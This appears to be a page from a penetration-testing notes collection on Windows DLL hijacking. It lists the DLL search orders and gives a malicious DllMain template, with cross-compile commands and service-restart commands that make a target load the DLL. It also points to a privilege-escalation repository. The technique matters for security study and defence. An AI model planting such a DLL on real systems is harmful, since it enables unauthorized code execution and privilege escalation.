killchain-compendium/Exploits/Windows/DLL Hijacking.md

DLL Hijacking

Basics

Search Orders

• SafeDllSearchMode enabled searches paths in following order:

  • cwd of executable
  • System directory, GetSystemDirectory
  • 16-bit system directory
  • Windows, GetWindowsDirectory
  • pwd
  • PATH

• SafeDllSearchMode disabled searches in following order:

  • cwd of executable
  • pwd
  • System directory
  • 16-bit system directory
  • Windows directory
  • PATH environment variable

Template

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
        ExitProcess(0);
    }
    return TRUE;
}

• Compilation via

x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll

• Upload to target
• Restart dllsvervice via

sc stop dllsvc
sc start dllsvc

LPE via StorSvc

• BlackArrowSec's repository